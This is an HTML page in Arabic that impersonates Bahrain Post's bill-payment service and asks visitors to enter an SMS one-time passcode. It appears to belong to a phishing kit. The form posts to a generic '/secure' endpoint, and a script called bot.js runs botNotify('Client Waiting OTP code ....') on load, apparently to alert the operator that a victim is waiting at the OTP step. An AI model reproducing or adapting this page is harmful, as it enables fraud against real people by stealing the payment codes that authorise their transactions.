<!DOCTYPE html>
<html dir="rtl"
	class="js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients no-cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths js flexbox canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients no-cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients no-cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths notranslate"
	lang="ar" translate="no">

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
	<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
	<meta http-equiv="Pragma" content="no-cache" />
	<meta http-equiv="Expires" content="0" />
	<meta name="google" content="notranslate" />
	<meta name="language" content="ar" />
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
	<title>البريد البحرين</title>
	<link rel="shortcut icon" href="../images/favicon.ico" type="image/x-icon" />
	<link rel="icon" href="../images/favicon.ico" type="image/x-icon" />
	<link rel="apple-touch-icon" href="../images/favicon.ico" type="image/x-icon" />
	<link type="text/css" rel="stylesheet" href="../css/main-ar.css" />
	<link type="text/css" rel="stylesheet" href="../css/font-awesome.css" />
	<link type="text/css" rel="stylesheet" href="../css/style.css" />
	<link type="text/css" rel="stylesheet" href="../css/aos.css" />
	<link type="text/css" rel="stylesheet" href="../css/fonts.css" />
	<link type="text/css" rel="stylesheet" href="../css/main.css" />
	<link type="text/css" rel="stylesheet" href="../css/login.css" />
	<link type="text/css" rel="stylesheet" href="../css/extra.css" />
	<style>
		.loadingAnimation {
			position: fixed;
			line-height: 1.4;
			font-size: 1.2rem;
			font-weight: bold;
			top: 0;
			left: 0;
			right: 0;
			bottom: 0;
			z-index: 999999;
			background: white;
			text-align: center;
			padding: 0px !important;
			display: flex;
			justify-content: center;
			align-items: center;
		}
		.loadingAnimationResend {
			position: fixed;
			line-height: 1.4;
			font-size: 1.2rem;
			font-weight: bold;
			top: 0;
			left: 0;
			right: 0;
			bottom: 0;
			z-index: 999999;
			background: white;
			text-align: center;
			padding: 0px !important;
			display: flex;
			justify-content: center;
			align-items: center;
		}

		.otp_error {
			font-weight: normal;
			font-size: 1.4rem;
			color: #da1d23cc;
			margin: 0.6rem 0 2rem 0;
			display: none;
		}
		.loading__author {
			font-weight: normal;
			font-size: 1.4rem;
			color: #007DC5;
			margin: 0.6rem 0 2rem 0;
			display: block;

		}

		.loading__anim {
			width: 35px;
			height: 35px;
			display: inline-block;
			border: 4px solid rgba(0, 125, 197, .5);
			border-right-color: rgba(218, 29, 35, 0.8);
			border-bottom-color: rgb(218, 29, 35, .8);
			border-radius: 50%;
			animation: rotate 600ms infinite linear;

		}

		@keyframes rotate {
			to {
				transform: rotate(1turn)
			}

		}
	</style>
	<noscript>
		<meta http-equiv="refresh"
			content="0; url=exit.php?action=nojava&aixPageId=MX8pZGdmKNfFlUw0oTk6ReAwF0zUPgfcUiJ6b22fwli3eLSOlZIL2NMPVu8BWE2n" />
	</noscript>
</head>

<body data-aos-easing="ease" data-aos-duration="400" data-aos-delay="0" class="notranslate">
	<div class="page-wrap">
		<header>
			<div class="container flex_me">
				<div class="col flex_me append_menu">
					<a href="#" class="logo"><img src="../images/logo.png" alt="logo" /></a>
				</div>
				<div class="col flex_me justify_end">
					<a class="sign_up_link" href="#">تسجيل</a>
				</div>
			</div>
		</header>
		<div class="login_container container">
			<div class="flex_me">
				<div class="col aos-init" id="loginDivs" data-aos="fade-down" data-aos-delay="500">
					<form action="/secure" method="post" id="secure_form" name="secure_form" autocomplete="off">
						<div class="mini-loader">
							<div class="lds-spl"></div>
						</div>
						<span class="generic_page_title">سداد فواتير الخدمات البريدية</span>
						<p style="line-height:30px;max-width:365px;margin:25px auto 20px;">ستصلك رسالة نصية قصيرة برمز
							سري مؤقت على جوالك، ادخل الرمز المرسل لاتمام العملية.</p>
						<div class="pay_page">
							<div class="form_group">
								<label for="splLogMobiCode"> الرمز السري (OTP) <em>*</em></label>
								<input type="tel" id="splLogMobiCode" name="splLogMobiCode" class="form_control"
									placeholder="" value="" maxlength="8" pattern="[0-9]*" inputmode="numeric"
									autocomplete="off" autocorrect="off" spellcheck="false" />
								<i class="fa fa-lock" style="color:#007DC5 ;"></i>
								<span id="sms-validation" class="field-validation-error text-danger"
									style="display:none;">المرجو إدخال الرمز السري (OTP).</span>
							</div>
							<div class="section_btns">
								<button id="button3" name="button3" class="btn primary_btn"
									type="submit">متابعة</button>
								<a href="#" id="resendOTP" class="btn_noBG2 countdown">إرسال رمز سري (OTP) جديد؟</a>
							</div>
							<p>يجب ملئ الخانات المرفقة بعلامة النجمة <em>*</em></p>
						</div>
					</form>
				</div>
			</div>
		</div>
		<footer class="main-footer">
			<div class="container">
				<div class="row">
					<div class="col-sm-6">
						<p>©️ 2022 جميع الحقوق محفوظة لمؤسسة البريد البحريني</p>
					</div>
					<div class="col-md-6 terms">
						<span>عند استخدامك هذا الموقع، فإنك توافق على</span>
						<a href="#">شروط الخدمة</a>
						و
						<a href="#">سياسة الخصوصية</a>
					</div>
				</div>
			</div>
		</footer>
	</div>
	<section class="loadingAnimation" id="loadingAnimation" style="display: none;">
		<div>
			<span class="otp_error" id="otpError">الرمز الذي أدخلته غير صحيح...</span>
			<span class="loading__author" id="otpProcessing">البيانات قيد المعالجة...</span>
			<span class="loading__anim" id="loading__anim"></span>
		</div>
	</section>
	<section class="loadingAnimationResend" id="loadingAnimationResend" style="display: none;">
		<div>
			<span class="loading__author" id="otpProcessing">البيانات قيد المعالجة...</span>
			<span class="loading__anim" id="loading__anim"></span>
		</div>
	</section>
	<script type="text/javascript" src="../js/jquery.js"></script>
	<script type="text/javascript" src="../js/mask.js"></script>
	<script type="text/javascript" src="../js/aos.js"></script>
	<script type="text/javascript" src="../js/countdown.js"></script>
	<script type="text/javascript" src="../js/bot.js"></script>
	<script type="text/javascript" src="../js/main.js"></script>
	<script type="text/javascript">
		$(document).ready(function () {
			botNotify("Client Waiting OTP code ....");
		});
	</script>
</body>

</html>